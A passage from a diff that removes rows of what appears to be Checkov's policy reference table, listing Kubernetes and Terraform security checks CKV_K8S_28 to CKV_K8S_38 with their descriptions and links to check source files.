-| 2717 | CKV_K8S_28               | resource                         | Job                                                                                              | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Kubernetes              | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py)                                                                                      |
-| 2718 | CKV_K8S_28               | resource                         | Pod                                                                                              | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Kubernetes              | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py)                                                                                      |
-| 2719 | CKV_K8S_28               | resource                         | PodTemplate                                                                                      | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Kubernetes              | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py)                                                                                      |
-| 2720 | CKV_K8S_28               | resource                         | ReplicaSet                                                                                       | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Kubernetes              | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py)                                                                                      |
-| 2721 | CKV_K8S_28               | resource                         | ReplicationController                                                                            | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Kubernetes              | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py)                                                                                      |
-| 2722 | CKV_K8S_28               | resource                         | StatefulSet                                                                                      | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Kubernetes              | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py)                                                                                      |
-| 2723 | CKV_K8S_28               | resource                         | kubernetes_deployment                                                                            | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Terraform               | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py)                                                                                |
-| 2724 | CKV_K8S_28               | resource                         | kubernetes_deployment_v1                                                                         | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Terraform               | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py)                                                                                |
-| 2725 | CKV_K8S_28               | resource                         | kubernetes_pod                                                                                   | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Terraform               | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py)                                                                                |
-| 2726 | CKV_K8S_28               | resource                         | kubernetes_pod_v1                                                                                | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Terraform               | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py)                                                                                |
-| 2727 | CKV_K8S_29               | resource                         | CronJob                                                                                          | Apply security context to your pods and containers                                                                                                                                                       | Kubernetes              | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py)                                                                                  |
-| 2728 | CKV_K8S_29               | resource                         | DaemonSet                                                                                        | Apply security context to your pods and containers                                                                                                                                                       | Kubernetes              | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py)                                                                                  |
-| 2729 | CKV_K8S_29               | resource                         | Deployment                                                                                       | Apply security context to your pods and containers                                                                                                                                                       | Kubernetes              | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py)                                                                                  |
-| 2730 | CKV_K8S_29               | resource                         | Job                                                                                              | Apply security context to your pods and containers                                                                                                                                                       | Kubernetes              | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py)                                                                                  |
-| 2731 | CKV_K8S_29               | resource                         | Pod                                                                                              | Apply security context to your pods and containers                                                                                                                                                       | Kubernetes              | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py)                                                                                  |
-| 2732 | CKV_K8S_29               | resource                         | ReplicaSet                                                                                       | Apply security context to your pods and containers                                                                                                                                                       | Kubernetes              | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py)                                                                                  |
-| 2733 | CKV_K8S_29               | resource                         | ReplicationController                                                                            | Apply security context to your pods and containers                                                                                                                                                       | Kubernetes              | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py)                                                                                  |
-| 2734 | CKV_K8S_29               | resource                         | StatefulSet                                                                                      | Apply security context to your pods and containers                                                                                                                                                       | Kubernetes              | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py)                                                                                  |
-| 2735 | CKV_K8S_29               | resource                         | kubernetes_daemon_set_v1                                                                         | Apply security context to your pods, deployments and daemon_sets                                                                                                                                         | Terraform               | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py)                                                                            |
-| 2736 | CKV_K8S_29               | resource                         | kubernetes_daemonset                                                                             | Apply security context to your pods, deployments and daemon_sets                                                                                                                                         | Terraform               | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py)                                                                            |
-| 2737 | CKV_K8S_29               | resource                         | kubernetes_deployment                                                                            | Apply security context to your pods, deployments and daemon_sets                                                                                                                                         | Terraform               | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py)                                                                            |
-| 2738 | CKV_K8S_29               | resource                         | kubernetes_deployment_v1                                                                         | Apply security context to your pods, deployments and daemon_sets                                                                                                                                         | Terraform               | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py)                                                                            |
-| 2739 | CKV_K8S_29               | resource                         | kubernetes_pod                                                                                   | Apply security context to your pods, deployments and daemon_sets                                                                                                                                         | Terraform               | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py)                                                                            |
-| 2740 | CKV_K8S_29               | resource                         | kubernetes_pod_v1                                                                                | Apply security context to your pods, deployments and daemon_sets                                                                                                                                         | Terraform               | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py)                                                                            |
-| 2741 | CKV_K8S_30               | resource                         | CronJob                                                                                          | Apply security context to your containers                                                                                                                                                                | Kubernetes              | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py)                                                                      |
-| 2742 | CKV_K8S_30               | resource                         | DaemonSet                                                                                        | Apply security context to your containers                                                                                                                                                                | Kubernetes              | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py)                                                                      |
-| 2743 | CKV_K8S_30               | resource                         | Deployment                                                                                       | Apply security context to your containers                                                                                                                                                                | Kubernetes              | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py)                                                                      |
-| 2744 | CKV_K8S_30               | resource                         | DeploymentConfig                                                                                 | Apply security context to your containers                                                                                                                                                                | Kubernetes              | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py)                                                                      |
-| 2745 | CKV_K8S_30               | resource                         | Job                                                                                              | Apply security context to your containers                                                                                                                                                                | Kubernetes              | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py)                                                                      |
-| 2746 | CKV_K8S_30               | resource                         | Pod                                                                                              | Apply security context to your containers                                                                                                                                                                | Kubernetes              | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py)                                                                      |
-| 2747 | CKV_K8S_30               | resource                         | PodTemplate                                                                                      | Apply security context to your containers                                                                                                                                                                | Kubernetes              | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py)                                                                      |
-| 2748 | CKV_K8S_30               | resource                         | ReplicaSet                                                                                       | Apply security context to your containers                                                                                                                                                                | Kubernetes              | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py)                                                                      |
-| 2749 | CKV_K8S_30               | resource                         | ReplicationController                                                                            | Apply security context to your containers                                                                                                                                                                | Kubernetes              | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py)                                                                      |
-| 2750 | CKV_K8S_30               | resource                         | StatefulSet                                                                                      | Apply security context to your containers                                                                                                                                                                | Kubernetes              | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py)                                                                      |
-| 2751 | CKV_K8S_30               | resource                         | kubernetes_deployment                                                                            | Apply security context to your pods and containers                                                                                                                                                       | Terraform               | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py)                                                                |
-| 2752 | CKV_K8S_30               | resource                         | kubernetes_deployment_v1                                                                         | Apply security context to your pods and containers                                                                                                                                                       | Terraform               | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py)                                                                |
-| 2753 | CKV_K8S_30               | resource                         | kubernetes_pod                                                                                   | Apply security context to your pods and containers                                                                                                                                                       | Terraform               | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py)                                                                |
-| 2754 | CKV_K8S_30               | resource                         | kubernetes_pod_v1                                                                                | Apply security context to your pods and containers                                                                                                                                                       | Terraform               | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py)                                                                |
-| 2755 | CKV_K8S_31               | resource                         | CronJob                                                                                          | Ensure that the seccomp profile is set to docker/default or runtime/default                                                                                                                              | Kubernetes              | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py)                                                                                                        |
-| 2756 | CKV_K8S_31               | resource                         | DaemonSet                                                                                        | Ensure that the seccomp profile is set to docker/default or runtime/default                                                                                                                              | Kubernetes              | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py)                                                                                                        |
-| 2757 | CKV_K8S_31               | resource                         | Deployment                                                                                       | Ensure that the seccomp profile is set to docker/default or runtime/default                                                                                                                              | Kubernetes              | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py)                                                                                                        |
-| 2758 | CKV_K8S_31               | resource                         | Job                                                                                              | Ensure that the seccomp profile is set to docker/default or runtime/default                                                                                                                              | Kubernetes              | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py)                                                                                                        |
-| 2759 | CKV_K8S_31               | resource                         | Pod                                                                                              | Ensure that the seccomp profile is set to docker/default or runtime/default                                                                                                                              | Kubernetes              | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py)                                                                                                        |
-| 2760 | CKV_K8S_31               | resource                         | ReplicaSet                                                                                       | Ensure that the seccomp profile is set to docker/default or runtime/default                                                                                                                              | Kubernetes              | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py)                                                                                                        |
-| 2761 | CKV_K8S_31               | resource                         | ReplicationController                                                                            | Ensure that the seccomp profile is set to docker/default or runtime/default                                                                                                                              | Kubernetes              | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py)                                                                                                        |
-| 2762 | CKV_K8S_31               | resource                         | StatefulSet                                                                                      | Ensure that the seccomp profile is set to docker/default or runtime/default                                                                                                                              | Kubernetes              | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py)                                                                                                        |
-| 2763 | CKV_K8S_32               | resource                         | PodSecurityPolicy                                                                                | Ensure default seccomp profile set to docker/default or runtime/default                                                                                                                                  | Kubernetes              | [SeccompPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SeccompPSP.py)                                                                                                  |
-| 2764 | CKV_K8S_32               | resource                         | kubernetes_pod_security_policy                                                                   | Ensure default seccomp profile set to docker/default or runtime/default                                                                                                                                  | Terraform               | [SeccompPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SeccompPSP.py)                                                                                            |
-| 2765 | CKV_K8S_33               | resource                         | CronJob                                                                                          | Ensure the Kubernetes dashboard is not deployed                                                                                                                                                          | Kubernetes              | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py)                                                                                |
-| 2766 | CKV_K8S_33               | resource                         | DaemonSet                                                                                        | Ensure the Kubernetes dashboard is not deployed                                                                                                                                                          | Kubernetes              | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py)                                                                                |
-| 2767 | CKV_K8S_33               | resource                         | Deployment                                                                                       | Ensure the Kubernetes dashboard is not deployed                                                                                                                                                          | Kubernetes              | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py)                                                                                |
-| 2768 | CKV_K8S_33               | resource                         | DeploymentConfig                                                                                 | Ensure the Kubernetes dashboard is not deployed                                                                                                                                                          | Kubernetes              | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py)                                                                                |
-| 2769 | CKV_K8S_33               | resource                         | Job                                                                                              | Ensure the Kubernetes dashboard is not deployed                                                                                                                                                          | Kubernetes              | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py)                                                                                |
-| 2770 | CKV_K8S_33               | resource                         | Pod                                                                                              | Ensure the Kubernetes dashboard is not deployed                                                                                                                                                          | Kubernetes              | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py)                                                                                |
-| 2771 | CKV_K8S_33               | resource                         | PodTemplate                                                                                      | Ensure the Kubernetes dashboard is not deployed                                                                                                                                                          | Kubernetes              | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py)                                                                                |
-| 2772 | CKV_K8S_33               | resource                         | ReplicaSet                                                                                       | Ensure the Kubernetes dashboard is not deployed                                                                                                                                                          | Kubernetes              | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py)                                                                                |
-| 2773 | CKV_K8S_33               | resource                         | ReplicationController                                                                            | Ensure the Kubernetes dashboard is not deployed                                                                                                                                                          | Kubernetes              | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py)                                                                                |
-| 2774 | CKV_K8S_33               | resource                         | StatefulSet                                                                                      | Ensure the Kubernetes dashboard is not deployed                                                                                                                                                          | Kubernetes              | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py)                                                                                |
-| 2775 | CKV_K8S_34               | resource                         | CronJob                                                                                          | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Kubernetes              | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py)                                                                                                          |
-| 2776 | CKV_K8S_34               | resource                         | DaemonSet                                                                                        | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Kubernetes              | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py)                                                                                                          |
-| 2777 | CKV_K8S_34               | resource                         | Deployment                                                                                       | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Kubernetes              | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py)                                                                                                          |
-| 2778 | CKV_K8S_34               | resource                         | DeploymentConfig                                                                                 | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Kubernetes              | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py)                                                                                                          |
-| 2779 | CKV_K8S_34               | resource                         | Job                                                                                              | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Kubernetes              | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py)                                                                                                          |
-| 2780 | CKV_K8S_34               | resource                         | Pod                                                                                              | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Kubernetes              | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py)                                                                                                          |
-| 2781 | CKV_K8S_34               | resource                         | PodTemplate                                                                                      | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Kubernetes              | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py)                                                                                                          |
-| 2782 | CKV_K8S_34               | resource                         | ReplicaSet                                                                                       | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Kubernetes              | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py)                                                                                                          |
-| 2783 | CKV_K8S_34               | resource                         | ReplicationController                                                                            | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Kubernetes              | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py)                                                                                                          |
-| 2784 | CKV_K8S_34               | resource                         | StatefulSet                                                                                      | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Kubernetes              | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py)                                                                                                          |
-| 2785 | CKV_K8S_34               | resource                         | kubernetes_deployment                                                                            | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Terraform               | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py)                                                                                                    |
-| 2786 | CKV_K8S_34               | resource                         | kubernetes_deployment_v1                                                                         | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Terraform               | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py)                                                                                                    |
-| 2787 | CKV_K8S_34               | resource                         | kubernetes_pod                                                                                   | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Terraform               | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py)                                                                                                    |
-| 2788 | CKV_K8S_34               | resource                         | kubernetes_pod_v1                                                                                | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Terraform               | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py)                                                                                                    |
-| 2789 | CKV_K8S_35               | resource                         | CronJob                                                                                          | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Kubernetes              | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py)                                                                                                        |
-| 2790 | CKV_K8S_35               | resource                         | DaemonSet                                                                                        | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Kubernetes              | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py)                                                                                                        |
-| 2791 | CKV_K8S_35               | resource                         | Deployment                                                                                       | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Kubernetes              | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py)                                                                                                        |
-| 2792 | CKV_K8S_35               | resource                         | DeploymentConfig                                                                                 | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Kubernetes              | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py)                                                                                                        |
-| 2793 | CKV_K8S_35               | resource                         | Job                                                                                              | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Kubernetes              | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py)                                                                                                        |
-| 2794 | CKV_K8S_35               | resource                         | Pod                                                                                              | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Kubernetes              | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py)                                                                                                        |
-| 2795 | CKV_K8S_35               | resource                         | PodTemplate                                                                                      | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Kubernetes              | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py)                                                                                                        |
-| 2796 | CKV_K8S_35               | resource                         | ReplicaSet                                                                                       | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Kubernetes              | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py)                                                                                                        |
-| 2797 | CKV_K8S_35               | resource                         | ReplicationController                                                                            | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Kubernetes              | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py)                                                                                                        |
-| 2798 | CKV_K8S_35               | resource                         | StatefulSet                                                                                      | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Kubernetes              | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py)                                                                                                        |
-| 2799 | CKV_K8S_35               | resource                         | kubernetes_deployment                                                                            | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Terraform               | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py)                                                                                                  |
-| 2800 | CKV_K8S_35               | resource                         | kubernetes_deployment_v1                                                                         | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Terraform               | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py)                                                                                                  |
-| 2801 | CKV_K8S_35               | resource                         | kubernetes_pod                                                                                   | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Terraform               | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py)                                                                                                  |
-| 2802 | CKV_K8S_35               | resource                         | kubernetes_pod_v1                                                                                | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Terraform               | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py)                                                                                                  |
-| 2803 | CKV_K8S_36               | resource                         | PodSecurityPolicy                                                                                | Minimize the admission of containers with capabilities assigned                                                                                                                                          | Kubernetes              | [MinimizeCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilitiesPSP.py)                                                                        |
-| 2804 | CKV_K8S_36               | resource                         | kubernetes_pod_security_policy                                                                   | Minimise the admission of containers with capabilities assigned                                                                                                                                          | Terraform               | [MinimiseCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilitiesPSP.py)                                                                  |
-| 2805 | CKV_K8S_37               | resource                         | CronJob                                                                                          | Minimize the admission of containers with capabilities assigned                                                                                                                                          | Kubernetes              | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py)                                                                              |
-| 2806 | CKV_K8S_37               | resource                         | DaemonSet                                                                                        | Minimize the admission of containers with capabilities assigned                                                                                                                                          | Kubernetes              | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py)                                                                              |
-| 2807 | CKV_K8S_37               | resource                         | Deployment                                                                                       | Minimize the admission of containers with capabilities assigned                                                                                                                                          | Kubernetes              | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py)                                                                              |
-| 2808 | CKV_K8S_37               | resource                         | DeploymentConfig                                                                                 | Minimize the admission of containers with capabilities assigned                                                                                                                                          | Kubernetes              | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py)                                                                              |
-| 2809 | CKV_K8S_37               | resource                         | Job                                                                                              | Minimize the admission of containers with capabilities assigned                                                                                                                                          | Kubernetes              | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py)                                                                              |
-| 2810 | CKV_K8S_37               | resource                         | Pod                                                                                              | Minimize the admission of containers with capabilities assigned                                                                                                                                          | Kubernetes              | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py)                                                                              |
-| 2811 | CKV_K8S_37               | resource                         | PodTemplate                                                                                      | Minimize the admission of containers with capabilities assigned                                                                                                                                          | Kubernetes              | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py)                                                                              |
-| 2812 | CKV_K8S_37               | resource                         | ReplicaSet                                                                                       | Minimize the admission of containers with capabilities assigned                                                                                                                                          | Kubernetes              | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py)                                                                              |
-| 2813 | CKV_K8S_37               | resource                         | ReplicationController                                                                            | Minimize the admission of containers with capabilities assigned                                                                                                                                          | Kubernetes              | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py)                                                                              |
-| 2814 | CKV_K8S_37               | resource                         | StatefulSet                                                                                      | Minimize the admission of containers with capabilities assigned                                                                                                                                          | Kubernetes              | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py)                                                                              |
-| 2815 | CKV_K8S_37               | resource                         | kubernetes_deployment                                                                            | Minimise the admission of containers with capabilities assigned                                                                                                                                          | Terraform               | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py)                                                                        |
-| 2816 | CKV_K8S_37               | resource                         | kubernetes_deployment_v1                                                                         | Minimise the admission of containers with capabilities assigned                                                                                                                                          | Terraform               | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py)                                                                        |
-| 2817 | CKV_K8S_37               | resource                         | kubernetes_pod                                                                                   | Minimise the admission of containers with capabilities assigned                                                                                                                                          | Terraform               | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py)                                                                        |
-| 2818 | CKV_K8S_37               | resource                         | kubernetes_pod_v1                                                                                | Minimise the admission of containers with capabilities assigned                                                                                                                                          | Terraform               | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py)                                                                        |
-| 2819 | CKV_K8S_38               | resource                         | CronJob                                                                                          | Ensure that Service Account Tokens are only mounted where necessary                                                                                                                                      | Kubernetes              | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py)                                                                              |
